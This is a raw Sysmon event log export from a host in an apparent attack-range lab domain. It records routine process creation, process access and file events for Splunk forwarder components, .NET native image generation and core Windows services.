154100x800000000000000019261Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:53.083{4DB9351A-A141-60D3-C002-00000000CF01}6648C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019299Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:54.945{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A142-60D3-C402-00000000CF01}1336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019298Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:54.930{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A142-60D3-C402-00000000CF01}1336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019297Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:54.930{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A142-60D3-C402-00000000CF01}1336C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019296Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:54.836{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A142-60D3-C302-00000000CF01}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019295Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:54.820{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A142-60D3-C302-00000000CF01}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019294Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:54.820{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A142-60D3-C302-00000000CF01}4476C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019293Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:54.742{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A142-60D3-C202-00000000CF01}3256C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019292Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:54.742{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019291Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:54.742{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019290Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:54.742{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019289Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:54.742{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019288Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:54.742{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A142-60D3-C202-00000000CF01}3256C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019287Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:54.742{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A142-60D3-C202-00000000CF01}3256C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000019286Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:54.743{4DB9351A-A142-60D3-C202-00000000CF01}3256C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000019285Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:54.695{4DB9351A-A140-60D3-BF02-00000000CF01}6980NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\3LWIYI6FA7\System.Windows.Forms.DataVisualization.ni.dll.auxMD5=B1B375697DC08A94D27AEF3BEAE75A09,SHA256=573F7CB2B7B7B63F94F7C653797D6983894D6C9A4AD13F8C0A8953B203CF1D58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019284Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:54.695{4DB9351A-A140-60D3-BF02-00000000CF01}6980NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\3LWIYI6FA7\System.Windows.Forms.DataVisualization.ni.dllMD5=9156E23F2AFB70ECEEBF432384AF86BF,SHA256=093BE4FA0A2EFD66842621F0AD1480275BCC3E6C3BC5316BDC268B0DFF6F7E98,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019283Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:54.617{4DB9351A-A140-60D3-BF02-00000000CF01}6980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1b44-0\System.Windows.Forms.DataVisualization.dll2021-06-23 21:01:54.617 23542300x800000000000000019282Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:54.129{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1EB4102D617131A4E749DEF967C72F4,SHA256=974B14E4C948AEBC5C26603D6BED8EAC71B4252F3569E621866A5D29D8CA9CEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000019281Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:54.098{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7CBEB23F5729FD6F2124FC41D058EAEA,SHA256=3CA725D6EE29C3EDC29525580E8D7BE620A17D3C43BBC3A6708BA82E24316FC3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000019333Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:55.805{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A143-60D3-CA02-00000000CF01}5588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019332Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:55.805{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019331Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:55.805{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019330Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:55.805{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019329Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:55.805{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019328Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:55.805{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A143-60D3-CA02-00000000CF01}5588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019327Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:55.805{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A143-60D3-CA02-00000000CF01}5588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000019326Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:55.805{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A143-60D3-C902-00000000CF01}5648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000019325Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:55.806{4DB9351A-A143-60D3-CA02-00000000CF01}5588C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000019324Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:55.789{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A143-60D3-C902-00000000CF01}5648C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000019323Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 